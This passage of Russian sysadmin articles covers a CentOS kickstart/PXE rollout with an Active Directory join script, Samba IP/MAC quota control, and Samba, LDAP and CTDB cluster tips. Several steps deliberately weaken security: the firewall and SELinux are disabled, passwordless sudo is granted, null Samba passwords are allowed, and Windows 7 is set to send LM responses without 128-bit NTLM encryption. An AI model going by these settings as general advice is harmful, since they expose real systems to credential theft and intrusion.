несколько файлов, используемых при загрузке. cp boot.cat boot.msg grub.conf initrd.img splash.jpg TRANS.TBL vesamenu.c32 vmlinuz /tftpboot Добавляем ссылку на файл автоматической инсталяции в параметры ядра. В строки append initrd=initrd.img надо дописать ks=nfs:172.17.17.254:/pub/CentOS-conf/desktop.cfg, где nfs - протокол, по которому надо брать файл конфигурации, 172.17.17.254 - адрес сервера, /pub/CentOS-conf/desktop.cfg - полное имя файла. Получается файл /tftpboot/pxelinux.cfg/default примерно такого вида: default vesamenu.c32 #prompt 1 timeout 80 display boot.msg menu background splash.jpg menu title Welcome to CentOS 6.3! menu color border 0 #ffffffff #00000000 menu color sel 7 #ffffffff #ff000000 menu color title 0 #ffffffff #00000000 menu color tabmsg 0 #ffffffff #00000000 menu color unsel 0 #ffffffff #00000000 menu color hotsel 0 #ff000000 #ffffffff menu color hotkey 7 #ffffffff #ff000000 menu color scrollbar 0 #ffffffff #00000000 label linux menu label ^Install or upgrade an existing system menu default kernel vmlinuz append initrd=initrd.img ks=nfs:172.17.17.254:/pub/CentOS-conf/desktop.cfg label vesa menu label Install system with ^basic video driver kernel vmlinuz append initrd=initrd.img xdriver=vesa nomodeset ks=nfs:172.17.17.254:/pub/CentOS-conf/desktop.cfg label rescue menu label ^Rescue installed system kernel vmlinuz append initrd=initrd.img rescue label local menu label Boot from ^local drive localboot 0xffff label memtest86 menu label ^Memory test kernel memtest append - 3. Проблема совместимости 64-битной ОС с 32-битными приложениями. При наличии 32-битных библиотек у 64-битной ОС ни каких проблем совместимости нет. Но вот не задача: новый yum теперь 32-битные библиотеки ставить не будет. Дело всё в параметре multilib_policy - в 5-ом CentOSе он имел значение all, теперь - best. Как правильно побороть это на этапе установки - не знаю. В Интернете нашёл, как побороть это по-быстрому (http://lists.centos.org/pipermail/centos/2011-July/114513.html). Вытаскиваем из архива файл yuminstall.py во временную папку mkdir /tmp/1 cd /tmp/1 rpm2cpio /pub/CentOS/Packages/anaconda-13.21.176-1.el6.centos.x86_64.rpm | cpio -id ./usr/lib/anaconda/yuminstall.py Добавляем строку multilib_policy=all после строки [main], где-то 1252 строка файла. Можно применить такой патчик: cd usr/lib/anaconda/ cat <<EOP > patch --- yuminstall.py.orig 2012-12-25 13:49:06.979604951 +0400 +++ yuminstall.py 2012-12-25 13:51:15.433740741 +0400 @@ -1250,6 +1250,7 @@ buf = """ [main] +multilib_policy=all installroot=%s cachedir=/var/cache/yum keepcache=0 EOP patch < patch Кладём подправленный файл в папку, откуда его точно заглотит инсталлятор: mkdir /pub/CentOS/RHupdates/ cp yuminstall.py /pub/CentOS/RHupdates/ 4. Создание конфигурации Kickstart. Теперь надо создать конфигурационный файл инсталлятора. Сделать это проще всего в графическом конфигураторе system-config-kickstart yum install system-config-kickstart system-config-kickstart Запускается простой Х-овый интерфейс выбора параметров. Заполняем его по своему усмотрению, ключевыми являются закладки "Метод установки" и "Сценарий после установки". Т.к. я изначально решил устанавливать по NFS в методе установки указываем "Выполнить новую установку", "Установочный носитель" - NFS, "Сервер NFS" - 172.17.17.254 и "Каталог NFS" - /pub/CentOS. Содержимое закладки "Сценарий после установки" можно скопировать из примера конфигурационного файла, приведённого ниже, между полями %post и %end. Пакеты выбираем по собственному вкусу, но для интеграции с Active Directory необходимы samba-winbind krb5-workstation openldap-clients их можно выбрать в "Выбор пакетов" -> "Базовая система" -> "Клиент каталогов". На всякий случай, мало ли на какой каталог придётся переползать, я ставлю вообще все пакеты этого подраздела. Сохраняем файл конфигурации /pub/CentOS-conf/desktop.cfg - именно на него ссылаются параметры ks из п.2. У меня файл /pub/CentOS-conf/desktop.cfg получился таким (он содержит комментарии на русском, их лучше удалить перед использованием - не хватало ещё глюков из-за кириллицы): #platform=x86, AMD64, or Intel EM64T #version=DEVEL # Firewall configuration - Внутри локалки firewall по большей части мешает. firewall --disabled # Install OS instead of upgrade install # Use NFS installation media nfs --server=172.17.17.254 --dir=/pub/CentOS # Root password rootpw --iscrypted <зашифрованный пароль> # System authorization information auth --useshadow --passalgo=md5 --enablecache # Use text mode install text # Run the Setup Agent on first boot firstboot --disable # System keyboard keyboard ru # System language lang ru_RU # SELinux configuration selinux --disabled # Installation logging level logging --level=info ## Turnoff power after installation # Удобно при большом кол-ве одновременно заливаемых компов - готовые выключены, # и хорошо заметно, который можно уносить. Кикстарт не понимает всей прелести такого # и этот параметр приходится дописывать руками. poweroff # System timezone timezone Europe/Moscow # Network information network --bootproto=dhcp --device=eth0 --onboot=on # System bootloader configuration bootloader --location=mbr # Clear the Master Boot Record zerombr # Partition clearing information clearpart --all --initlabel # Disk partitioning information. # диски на компьютерах сейчас просто огромные, место жалеть не приходится part /boot --fstype="ext4" --size=1024 part swap --fstype="swap" --recommended part / --fstype="ext4" --size=131072 part /home --fstype="ext4" --grow --size=1 # # А вот тут - самое основное # Скрипт выполняется после всех основных действий по установки, в том числе # после заливки софта, но chroot-нутым в подготовленную машину. # %post # Скрипт создаётся в папке /tmp настраиваемого компьютера. Незачем ему там храниться. rm -f $0 # Говорим yum-у и впредь ставить 32-битные модули вместе с 64-битными. sed -i '/main/a multilib_policy=all' /etc/yum.conf # Делаем группу wheels истинно админской, чтобы даже пароль не спрашивала при sudo [ -d /etc/sudoers.d ] || mkdir /etc/sudoers.d echo '%root ALL=(ALL) NOPASSWD: ALL' >> /etc/sudoers.d/rootgrp chmod 0440 /etc/sudoers.d/rootgrp assureFileFolder() { local d=`dirname $1`; [ -d "$d" ] && return mkdir -p "$d" } # Конфигурация переключения раскладок клавиатуры в KDE kxkbrcFile=/etc/skel/.kde/share/config/kxkbrc assureFileFolder ${kxkbrcFile} cat <<EOKXKBRC > ${kxkbrcFile} [Layout] DisplayNames=us,ru LayoutList=us,ru LayoutLoopCount=-1 Model=pc101 Options=grp_led:scroll,grp:caps_toggle,grp:alt_shift_toggle,grp:shifts_toggle ResetOldOptions=true ShowFlag=true ShowLabel=true ShowLayoutIndicator=true ShowSingle=true SwitchMode=Window Use=true EOKXKBRC # Конфигурация локали KDE kdeglobFile=/etc/skel/.kde/share/config/kdeglobals assureFileFolder ${kdeglobFile} cat <<EOKGL > ${kdeglobFile} [Locale] Country=ru DateFormat=%A %d %B %Y Language=ru EOKGL # Конфигурация правописания KDE. kdespellCfg=/etc/skel/.kde/share/config/sonnetrc assureFileFolder ${kdespellCfg} cat <<EOKSPL > ${kdespellCfg} [Spelling] backgroundCheckerEnabled=true checkUppercase=true defaultClient= defaultLanguage=ru ignore_ru= skipRunTogether=true EOKSPL # Конфигурация переключения раскладок клавиатуры в GNOME. # Индикатор раскладок автоматически запускается только с GNOME 2.30, # а текущий гном в дистрибутиве Центоса - 2.28... # Так, что надо либо добавить сюда запуск индикатора, либо настраивать это руками... # Но оба этих упражнения - в другой раз. gnomekbdbase='/etc/skel/.gconf' gnomekbdfile='desktop/gnome/peripherals/keyboard/kbd/%gconf.xml' gkd=`dirname "${gnomekbdfile}"` mkdir -p "${gnomekbdbase}/${gkd}" d="${gkd}"; while [ "x${d}" != "x." ]; do touch ${gnomekbdbase}/$d/'%gconf.xml'; d=`dirname $d`; done sed 's/ /\\t/g' <<EOGCONFKBD > ${gnomekbdbase}/${gnomekbdfile} <?xml version="1.0"?> <gconf> <entry name="options" mtime="1357150396" type="list" ltype="string">  <li type="string"> <stringvalue>grp_led grp_led:scroll</stringvalue> </li> <li type="string"> <stringvalue>grp grp:caps_toggle</stringvalue> </li> <li type="string"> <stringvalue>grp grp:alt_shift_toggle</stringvalue> </li> <li type="string"> <stringvalue>grp grp:shifts_toggle</stringvalue> </li> </entry> </gconf> EOGCONFKBD chmod 0644 ${kxkbrcFile} ${kdeglobFile} ${kdespellCfg} ${gnomekbdbase}/${gnomekbdfile} # Создаём учётные записи для великих гуру - пусть имеют возможность зайти на любой компьютер # Creation of admins for u in guru0 guru1; do useradd -m -p '*' -g wheel -G root $u mkdir /home/$u/.ssh touch /home/$u/.ssh/authorized_keys chown -R $u:wheel /home/$u/.ssh chmod -R go-rwx /home/$u/.ssh done # А сюда вставляем их публичные ключи SSH. cat <<EOAK0 >> /home/guru0/.ssh/authorized_keys EOAK0 cat <<EOAK1 >> /home/guru1/.ssh/authorized_keys EOAK1 # # У меня установка будет в текстовом режиме, а при этом система получает 3 уровень запуска - исправляем на 5-й. sed -i 's/id:[3-5]:initdefault:/id:5:initdefault:/g' /etc/inittab # Монтируем раздел с дистрибутивом mkdir /tmp/pubDnld mount -o ro 172.17.17.254:/pub /tmp/pubDnld # Ставим дополнительные пакеты. rpm -ivh /tmp/pubDnld/Adobe/adobe-release-x86_64-1.0-1.noarch.rpm rpm --import /etc/pki/rpm-gpg/RPM-GPG-KEY-adobe-linux rpm -i /tmp/pubDnld/Adobe/flash-plugin-11.2.202.258-release.x86_64.rpm # Удаляем ненужные мне глобальные серверы времени и включаем себя как резервный сервер. # Список серверов времени будем получать по DHCP. sed -i.instbak '/^server /s/^/#/;/server[[:space:]]*127/s/^#//;/fudge[[:space:]]*127/s/^#//' /etc/ntp.conf echo 'NTPSERVERARGS=iburst' >> /etc/sysconfig/network # !!! А вот ради этого всё и затевается - ставим скрипт присоединения к домену cp /tmp/pubDnld/CentOS-conf/adsjoin /etc/init.d/ chmod a+x /etc/init.d/adsjoin # Включаем нужные сервисы и выключаем не нужные. chkconfig kdump off chkconfig ntpd on chkconfig adsjoin on %end # Мой список устанавлеваемых пакетов. Создан system-config-kickstart-ом. # %packages @additional-devel @backup-client @base @basic-desktop @cifs-file-server @client-mgmt-tools @console-internet @core @debugging @desktop-debugging @desktop-platform @desktop-platform-devel @development @directory-client @directory-server @eclipse @fonts @general-desktop @graphical-admin-tools @graphics @hardware-monitoring @input-methods @internet-applications @internet-browser @java-platform @kde-desktop @large-systems @legacy-unix @mysql @mysql-client @network-file-system-client @nfs-file-server @office-suite @performance @perl-runtime @php @print-client @remote-desktop-clients @ruby-runtime @russian-support @scientific @server-platform-devel @system-admin-tools @technical-writing @x11 ImageMagick SDL-devel cachefilesd cmake crypto-utils dcraw desktop-file-utils docbook-utils-pdf dump evolution-exchange expect expect gcc-java glade3 glibc-utils gnome-common gnome-devel-docs gnutls-devel gtk2-devel-docs hesinfo hplip hplip-gui i2c-tools icedtea-web inkscape kdebase-devel kdebase-workspace-devel kdegraphics-devel kdelibs-apidocs kdelibs-devel kdemultimedia-devel kdenetwork-devel kdepim-devel kdepimlibs-devel kdesdk kdesdk-devel krb5-appl-clients krb5-pkinit-openssl krb5-workstation ldapjdk libXau-devel libXaw-devel libXinerama-devel libXmu-devel libXpm-devel libXrandr-devel libbonobo-devel libreoffice-base libreoffice-emailmerge libreoffice-headless libreoffice-javafilter libreoffice-ogltrans libreoffice-presentation-minimizer libreoffice-report-builder libreoffice-wiki-publisher libudev-devel libusb-devel libuuid-devel libxslt-devel lm_sensors mc memtest86+ net-snmp-devel netpbm-progs nscd nss-pam-ldapd openldap-clients pam_krb5 pam_ldap perl-Test-Pod perl-Test-Pod-Coverage perl-suidperl pexpect php-mysql planner qt-doc rpmdevtools rpmlint ruby-irb samba samba-winbind screen sox startup-notification-devel systemtap-grapher taskjuggler texinfo tftp thunderbird xchat xfig xmlto-tex xmltoman xorg-x11-proto-devel xrestop xz-devel %end 5. Скрипт интеграции в Active Directory. Собственно, это то, ради чего писалась вся статья. Скрипт достаточно прост, предназначен для использования теми, кто знает, что такое Active Directory и имеет соответствующее звание - Ад-мин. Проверки входных данных есть, но очень слабые. Скрипт выполняет ряд важных действий:
Выполняет синхронизацию времени компьютера с доменом. Адреса NTP сервера(-ов) берутся из DHCP. Если синхронизация по чему либо не срабатывает - скрипт запрашивает адрес NTP сервера.
Запрашивает имя компьютера и домена.
Прописывает эти значения в файлах конфигурации Самбы, Цербера и Лдапа.
Запрашивает имя админа и авторизуется им в Цербере.
Присоединяет комп к Active Directory.
Выполняет ряд дополнительных настроек компьютера. Скрипт /pub/CentOS-conf/adsjoin #!/bin/bash # c#hkconfig: 345 98 1 ### BEGIN INIT INFO # Provides: adsjoin # Default-Start: 3 4 5 # Default-Stop: 0 1 2 6 # Required-Start: # Should-Start: $network # Short-Description: Requests ADS data and joins domain # Description: Asks user to enter ADS domain name, admin account and password. # Configures system to use ADS and joins it. ### END INIT INFO # Source function library. . /etc/init.d/functions FILENAME=/etc/sysconfig/adsjoin [ -z "$HOME" ] && export HOME=/ usage() { echo $"Usage: $0 {start|stop}" } prepareConfig() { # Fix system hostname fhn="${HOSTNAME,,}.${DOMAINNAME_FULL,,}" sed -i.adsjoinbak '/^HOSTNAME=/s/=.*/='$fhn'/' /etc/sysconfig/network hostname ${fhn} # add this name to work echo 127.0.0.1 ${fhn} ${fhn/.*} >> /etc/hosts cat <<EOSMB >> /etc/samba/smb.conf [global] winbind refresh tickets = true kerberos method = secrets and keytab EOSMB cat <<EOPWB >> /etc/security/pam_winbind.conf krb5_auth = yes cached_login = yes krb5_ccache_type = FILE EOPWB # --winbindtemplateprimarygroup=users \\ basedn=$(echo ${DOMAINNAME_FULL,,} | sed 's/^\\.*/dc=/;s/\\.*$//;s/\\.\\.*/,dc=/g') authconfig --update \\ --enablelocauthorize --enablecache \\ --enablekrb5realmdns --enablekrb5kdcdns \\ --ldapserver=ldap://${DOMAINNAME_FULL,,}/ --ldapbasedn=${basedn} \\ --enablemkhomedir --winbindtemplatehomedir=/home/%U --winbindtemplateshell=/bin/bash \\ --enablewinbindusedefaultdomain --enablewinbindauth --enablewinbind --enablewinbindoffline \\ --smbsecurity=ads --smbrealm=${DOMAINNAME_FULL} --smbworkgroup=${DOMAINNAME_SHORT} --smbservers='*' cat <<EOKRB > /etc/krb5.conf [logging] default = FILE:/var/log/krb5libs.log kdc = FILE:/var/log/krb5kdc.log admin_server = FILE:/var/log/kadmind.log [libdefaults] default_realm = ${DOMAINNAME_FULL} dns_lookup_realm = true dns_lookup_kdc = true ticket_lifetime = 24h renew_lifetime = 7d forwardable = true [domain_realm] .${DOMAINNAME_FULL,,} = ${DOMAINNAME_FULL} ${DOMAINNAME_FULL,,} = ${DOMAINNAME_FULL} EOKRB } askHostDom() { local hn dn while :; do read -p 'Enter HOSTNAME without domain: ' hn [ 0 -eq "$?" -a 4 -le ${#hn} -a ${#hn} -le 15 -a -z "$(expr "$hn" : '[a-zA-Z0-9-]*\$.*\$')" ] && break; echo "Wrong value ${hn}" echo "You have to specify HOSTNAME 4 to 15 chars long." echo "Only numbers, latin letter and '-' are allowed." done while :; do read -p 'Enter DOMAINNAME: ' dn [ 0 -eq "$?" -a 6 -le ${#dn} -a -z "$(expr "$dn" : '[.a-zA-Z0-9-]*\$.*\$')" ] && break; echo "Wrong value ${dn}" echo "You have to specify DOMAINNAME at least 6 chars long." echo "Only latin letter, numbers, '.' and '-' are allowed." done HOSTNAME="$hn" DOMAINNAME_FULL="${dn^^}" DOMAINNAME_SHORT=${DOMAINNAME_FULL/.*} } askOrgDir() { local od echo 'Enter Organizational directory where to create computer'\\''s account. Defaut is "Computers".' echo 'Example: Site/Unit/Computers' read -p 'Org. dir.: ' od ORG_DIRECTORY="$od" } askAdmAccount() { local un while :; do read -p "Enter Admin account of scpecified domain: " un [ 0 -eq "$?" -a 1 -lt ${#un} ] && break; echo "Wrong value ${un}" echo "You have to specify admin account at least 1 char long." done ADMINACCOUNT="$un" } case "$1" in start) if [ `/usr/bin/id -u` -ne 0 ]; then echo $"ERROR: Only root can run $0" exit 4 fi if [ ! -f /usr/bin/net ]; then echo $"ERROR: samba is not installed" exit 5 fi args="" if [ -f $FILENAME ] && [ ! -z "$(grep 'RUN_ADSJOIN=NO' $FILENAME)" ]; then exit 0 fi . /etc/profile.d/lang.sh /usr/bin/plymouth --hide-splash echo echo '========================================================' echo '============ Joining ADS' echo '========================================================' echo NTPSRVSRC='DHCP' NTPSRVS=$(sed -n 's/^server[[:space:]]*\$[^[:space:]]*\$.*/\\1/p' /etc/ntp.conf| grep -v '^127' | sort -u) while :; do if [ -n "$NTPSRVS" ] ; then if ntpdate -u -b $NTPSRVS then echo "Ok" break; else echo "Can not synchronize to $NTPSRVS" fi fi echo -e "WARNING!!!\\nNO working time servers specified by ${NTPSRVSRC}!" read -p 'Enter NTP server(s) of domain: ' NTPSRVS NTPSRVSRC=user done askHostDom echo prepareConfig echo service rsyslog restart /sbin/chkconfig winbind on RETVAL=255 HOME=/root LOGNAME=root USER=root export HOME LOGNAME USER cntr=3 while [ 0 -lt "$cntr" ]; do askAdmAccount if /usr/bin/kinit "${ADMINACCOUNT}"; then RETVAL=0; break; fi RETVAL=$? echo "Error loging in domain ${DOMAINNAME_FULL}" cntr=$(( $cntr - 1 )) done if [ "$RETVAL" -eq 0 ]; then cntr=3 while [ 0 -lt "$cntr" ]; do askOrgDir if [ -n "${ORG_DIRECTORY}" ]; then ADS_ORG="createcomputer='${ORG_DIRECTORY}'" else ADS_ORG="" fi ( eval "set -x; /usr/bin/net ads join -d 1 -k ${ADS_ORG}" ) 2>&1 | tee /tmp/net-ads-join-$$-$cntr # /usr/bin/net ads join -d 2 -k RETVAL=$? if [ "$RETVAL" -ne 0 ]; then echo "WARNING!!! Join failed" read -p 'Press Enter' else { /usr/bin/net -d 1 ads keytab create /sbin/service winbind restart /usr/bin/net -d 1 ads dns register } > /tmp/adsjoin-$$ 2>&1 break; fi cntr=$(( $cntr - 1 )) done fi /usr/bin/plymouth --show-splash # If adsjoin succeeded, chkconfig it off so we don't see the message # every time about starting up adsjoin. if [ "$RETVAL" -eq 0 ]; then action "" /bin/true else action "" /bin/false fi /sbin/chkconfig adsjoin off exit $RETVAL ;; stop) exit 0 ;; status) /sbin/chkconfig --list adsjoin | grep on >/dev/null RETVAL=$? if [ "$RETVAL" -eq 0 ]; then if [ ! -f $FILENAME ] || [ -z "$(grep 'RUN_ADSJOIN=NO' $FILENAME)" ]; then echo $"adsjoin is scheduled to run" else echo $"adsjoin is not scheduled to run" fi else echo $"adsjoin is not scheduled to run" fi exit 0 ;; restart | reload | force-reload | condrestart | try-restart) usage exit 3 ;; *) usage exit 2 ;; esac Примечание: Параметры "kerberos method" файла /etc/samba/smb.conf и "krb5_ccache_type" файла /etc/security/pam_winbind.conf должны соответствовать друг другу, иначе пользователь не сможет войти в систему. Как ни странно, синхронизация времени часто сбивается в первые секунды после получения адреса по dhcp - приходится вводить адреса серверов времени по нескольку раз. Скрипт перезапускает самбу и при его корректном завершении компьютер готов для работы без перезагрузки. 6. Запускаем компьютеры Подключаем к установочному VLAN-у коммутатор. Запасаемся веером патч-кордов, кабелей питания и пр. Подключаем сразу несколько компьютеров. Запускаем на каждом новом компьютере загрузку по сети, по протоколу PXE. У моих компьютеров сетевая загрузка была отключена, приходилось к каждому подключать монитор и клавиатуру и немного донастраивать BIOS. Но в итоге, параллельная подготовка компьютеров, включившая распаковку, заливку, введение в домен и упаковку для отправки в дальний офис занимала менее часа на десяток компьютеров, при том, что отдельный компьютер подготавливается около 15 минут. Что не добавлено 1. Если какие-либо системные утилиты, работающие под уч. записью root и понимающие, что такое Цербер, лезут к компьютерам домена, можно добавить в крон ежечасный вызов /usr/bin/net ads kerberos kinit -P - инициализация Церберного билета уч. записи компьютера. 2. Можно добавить клиенту DHCP скрипт само-регистрации в DNS: /etc/dhcp/dhclient.d/dnsreg.sh #!/bin/sh dnsreg_config() { if [ -x /usr/bin/net ] ; then /usr/bin/net ads dns register -P 2>&1 | logger -p daemon.info -t dhclient fi true } 3. Не настроен сервер обновлений. У нас CentOS ставился для пробы перед покупкой RedHat-а, обновлять его как-то не планировалось. Благодарности
Руководству - за поставленную задачу и время, выделенное на её решение.
VMWare - за незначительное количество "особенностей" в эмуляторе, в целом просто невероятным образом сократившего время отладки.
Microsoft - за незабываемое время проведённое в борьбе с Active Directory.
Wireshark.org - за отличный инструмент борьбы со всем этим счастьем.

Организация в Samba контроля пользователей по IP и MAC с псевдоквотами Автор: mastertron [комментарии]

Ниже представлена попытка без лишних усложнений решить задачу контроля по IP+MAC в Samba без запуска дополнительных служб в системе. В операционной системе создаются всего два системных пользователя с атрибутом nologin (smbfull с smblim). Данные о работающих в Samba пользователях хранятся в текстовом файле, с таким форматом: nicname_ФИО и дополнительная информация _IPaddress_MACaddress_limitsize(block) Итого пять полей с разделителем "_" (если в имени пользователя допускается знак подчеркивания, в приведенном ниже скрипте следует заменить "_", допустим, на "|"). При превышении указанного объема клиент может продолжать работать со своими документами, редактировать их, но добавить (создать) что-либо или удалить не сможет. Такой подход может удовлетворить небольшую сеть с индивидуальными ПК, где требуется:
нескольким пользователям подключить сетевые папки для документов, каждому свою, с привязкой по IP;
возможность иметь общие папки (внутри своих) между двумя или более пользователями для совместного доступа
исключить доступ с других ПК (и даже видимость в сетевом окружении)
избежать подключения с "левого" ПК (смена IP) посредством контроля MAC адреса
контролировать превышение объема информации в каждой директории, выделенной каждому пользователю. Часть решения подсказал некий robux на форуме linux.org.ru, у него просто авторизировались системные пользователи по IP. Создаем системных пользователей, первого "smbfull" в группе "smbfull", nologin. Второго "smblim" в группе "smbfull" Создаем тех же для самбы: smbpasswd -n -d smbfull smbpasswd -n -d smblim Каталоги созданных пользователей удалим и создадим общие /home/smbusers для каталогов пользователей и /home/smbses для, так называемых, сессионных каталогов. Пример файла конфигурации smb.conf [global] security = user passdb backend = smbpasswd:/etc/samba/smbpasswd username map script = /etc/samba/login.sh %I nullpasswords = yes directory mask = 755 create mask = 755 inherit owner = yes inherit permissions = yes log file = /var/log/smbd.%I max log size = 20 hosts allow = 192.168.0.0/24 socket address = 192.168.0.1 [docs] path = /home/smbses/%I public = yes writable = yes printable = no root postexec = /etc/samba/exit.sh %I Скрипт залогинивания login.sh #!/bin/sh - fses='/home/smbses/'$1 rm $fses v_ipmac=`/usr/local/bin/arp-scan -q --interface=rl1 $1 | sed -n '3p' | sed 's/[ ]/_/g'` res='' res=`grep $v_ipmac /etc/samba/access` if [ "$res" == "" ] then echo 'Blocked!!! - '$v_ipmac >> /home/smbusers/log exit fi v_nic=`echo $res | cut -d_ -f1` v_sz=`echo $res | cut -d_ -f5` v_dir='/home/smbusers/'$v_nic ln -s $v_dir $fses siz=`du -sL $fses | sed -e 's/[ ].*//g'` if [ $siz -gt $v_sz ] then echo 'limit exceeded! - '$v_nic' '$v_ipmac >> /home/smbusers/log echo 'smblim' else echo 'smbfull' fi Скрипт отключения exit.sh #!/bin/sh - rm /home/smbses/$1 Скрипт создания пользователей addusmb #!/bin/sh - fil='/etc/samba/access' echo `date` >> $fil echo -n ' User (nicname) - ' read v_nic res=`grep -c "^$v_nic" $fil` if [ $res != 0 ] then echo 'nicname '\"$v_nic\"' busy!!!' sleep 2 exit fi echo -n ' Fullname user - ' read v_fn echo -n ' User IP - ' read v_ip res=`grep -c "$v_ip" $fil` if [ $res != 0 ] then echo 'IP-'$v_ip' busy!!!' sleep 2 exit fi ping -w 1 -c 1 $v_ip >/dev/null if [ $? != 0 ]; then echo 'IP address unavailable :(' sleep 2 exit fi echo -n ' Allowable size of files (Mb)- ' read v_sm let "v_sz=$v_sm * 2048" v_ipmac=`/usr/local/bin/arp-scan -q --interface=rl1 $v_ip | sed -n '3p' | sed -e 's/[ ]/_/g'` # nicname_fullname_ip_mac_limit echo $v_nic'_'$v_fn'_'$v_ipmac'_'$v_sz >> /etc/samba/access v_dir='/home/smbusers/'$v_nic mkdir $v_dir chmod 755 $v_dir chown smbfull $v_dir chgrp smbfull $v_dir echo ' Ok!' sleep 1 В скриптах между "[" и "]" введен один пробел и один ТАБ. У каждого свой каталог, каждому назначаем допустимый объем информации, при достижении которого он теряет право на создание чего либо нового, но продолжает работать со своими документами. При подключении (либо сетевой диск, либо просто ярлык на ресурс) проверяется соответствие IP_MAC, и, если есть совпадение в файле access, то вытягивается с этой строки nicname и допустимый объем. Создается симлинк директории пользователя с /home/smbusers/user в /home/smbses/~IP Проверяется размер директории пользователя, сравнивается с дозволенным. Если значение меньше допустимого, то входим под пользователем smbfull с полными правами, если лимит превышен - входим под smblim. По завершении сеанса в Windows линк удаляется. Для организации общего ресурса между двумя или более пользователями ( с одинаковыми правами в этой папке!) просто делаем симлинк внутренней папки пользователя в папку другого (других). Можно еще добавить шару и делать так же симлинк какой-то папки пользователя в шару для публикаций файлов, при этом не бояться за их исчезновение или редактирование. При тестах не стоит спешить, при подключении (при обращении) создается линк и процесс сессии, при отключении от самбы (достаточно отключить сетевой диск или закрыть папку) линк с /home/smbses/ удаляется быстро, а вот процесс может еще повисеть. Пока процесс висит - самба вас помнит, и конфигурацию при подключении не перечитает. Можно дождаться закрытия процесса или убить вручную, тогда при подключении вступят в силу внесенные изменения.

Создание шаблонов блоков конфигурации samba при помощи опции "copy" (доп. ссылка 1) (доп. ссылка 2) Автор: Aleksandr Ivanov [обсудить]

Одной из директив, доступных в smb.conf, является опция copy, которая обеспечивает возможность клонирования записей и атрибутов общих ресурсов Samba. Используя эту директиву, можно создать шаблон службы со всеми необходимыми опциями вместо указания одних и тех же опций для каждой отдельной директории. Пример /etc/samba/smb.conf: [template1] browseable = yes writable = yes valid users = gpalis mnapolis rcamacho [template2] browseable = yes writable = no valid users = gpalis rcamacho peting [backup] path = /mnt/backup copy = template1 [workfiles] path = /share copy = template1 [csfiles] path /mnt/cs copy = template2

Решение проблемы с индексацией данных в связке Samba и LDAP (доп. ссылка 1) (доп. ссылка 2) Автор: Aleksandr Ivanov [комментарии]

При появлении в логе ошибок подобных: Feb 25 20:23:53 dc02 slapd[5677]: bdb_equality_candidates: (gidNumber) not indexed Feb 25 20:23:53 dc02 slapd[5677]: bdb_equality_candidates: (sambaSID) not indexed Feb 25 20:23:53 dc02 slapd[5677]: bdb_equality_candidates: (sambaSID) not indexed Feb 25 20:23:55 dc02 slapd[5677]: bdb_equality_candidates: (uid) not indexed Feb 25 20:23:55 dc02 slapd[5677]: bdb_equality_candidates: (uid) not indexed необходимо в файл конфигурации /etc/ldap/slapd.conf в раздел с директивами "database" добавить следующее: # Indices to maintain for this database index objectClass eq,pres index ou,cn,sn,mail,givenname eq,pres,sub index uidNumber,gidNumber,memberUid eq,pres index loginShell eq,pres # I also added this line to stop warning in syslog .. index uniqueMember eq,pres ## required to support pdb_getsampwnam index uid pres,sub,eq ## required to support pdb_getsambapwrid() index displayName pres,sub,eq # These attributes don't exist in this database .. #index nisMapName,nisMapEntry eq,pres,sub index sambaSID eq index sambaPrimaryGroupSID eq index sambaDomainName eq index default sub После этого: # /etc/init.d/slapd stop # slapindex WARNING! Runnig as root! There's a fair chance slapd will fail to start. Check file permissions! # chown openldap:openldap /var/lib/ldap/* # /etc/init.d/slapd start Starting OpenLDAP: slapd Добавляемые в slapd.conf строки примерны, поскольку наличие дополнительных строк или их отсутствие зависит от конфигурации.

Доступ к Samba из Windows 7 и Windows 2008 r2 Автор: 24pm [комментарии]

Начиная с версий Windows 7 и Windows 2008 r2 параметры авторизации у Microsoft поменялись. Скорее всего Samba вскоре это учтёт, а пока подружить системы можно изменив на Win7 свойства сетевой безопасности: "Пуск" "Панель управления" "Администрирование" "Локальная политика безопасности" "Локальные политики" Далее в блоке "Параметры безопасности" меняем: * Сетевая безопасность: минимальная сеансовая безопасность для клиентов на базе NTLM SSP - убрать галочку с "Требовать 128-битное шифрование". Таких параметра два - выполнить для обоих * Сетевая безопасность: уровень проверки подлинности LAN Manager - выбрать в списке пункт "Отправлять LM- и NTML-ответы"

Кластер Samba с использованием CTDB Автор: Панков Петр [комментарии]

Введение Данная статья описывает механизм развертывания файлового сервера на предварительно поднятом кластере высокой готовности (High-Aviability). Предполагается, что все кластерные службы, а так же службы обеспечения высокой готовности настроены и запущены. В моем случае, кластер состоит из 2-х узлов. Собственно ПО Поясню выбор ПО и, собственно, для чего это все делается. 1. Чтобы поднять кластер из соединенных между собой каналами связи серверов, необходимо установить некоторые службы для централизованного управления ресурсами, а также использовать кластерную ФС для организации общего хранилища. В случае, если используется ОС от RedHat, сюда входят: - CMAN - или cluster manager - служба управления кластером. демон, который соединяет и отсоединяет узлы от кластера. Выполняется на каждой ноде; - CCSD - это демон, который обеспечивает доступ к файлу конфигурации(cluster.conf) другим кластерным приложениям. Выполняется на каждом узле; - fencing - часть кластерной системы конфигурации. Этот демон блокирует доступ узлу, с которым отсутствует связь, к общим ресурсам кластера. - GFS2 в качестве кластерной ФС. 2. Чтобы поднять кластер высокой готовности, необходимо решить ряд задач, а именно, обеспечить целостность данных и доступность ресурсов при отказе одного из узлов. - DRBD. По сути, сетевой RAID1. Используется для репликации данных. Таким образом данные всегда доступны при отказе одного из узлов. Начиная с версии 8, DRBD позволяет организовать работу всех устройств в режиме "primary", в отличае от предыдущих версий, где primary устройство было единственное. - HeartBeat. Механизизм "сердцебиения". Эта служба "наблюдает" за узлами, и, в случае, отказа одного из них, передает задачу другому, рабочему узлу. Таким образом, достигается доступность сервисов. 3. Чтобы поднять файловый сервер на данном кластере и использовать его для Windows-клиентов, необходимо использовать Samba'у. Текущая версия Samba не поддерживает развертывание её на кластере из-за свеобразного механизма работы. Поясню: Samba использует легковесную базу данных (TDB) для приведения соответствия Windows SID к Unix UID/GID (таблицы ID-мэппинга), хранения данных об открытых сессиях (session.tdb), таблицу блокировок файловой системы (locking.tdb), а также ряд других параметров. Если использовать классическую конфигурацию на кластере "как есть", получим следующее: На каждом узле работает свой демон smbd и каждый узел имеет свою копию TDB, причем эти TDB никак не связаны между собой и не имеют механизма взаимодействия. Это и является проблемой. Необходимо, чтобы все узлы кластера "знали" в каждый момент времени некоторые значения из всех TDB. Ключевым здесь является - locking.tdb и session.tdb. Для этих целей и используется CTDB. CTDB преобразует стандартный механизм работы Samba с TDB: все локальные locking.tdb и session.tdb - преобразуются в распределенную базу данных, таблицы ID-мэппинга остаются под управлением локальных демонов smbd. CTDB также 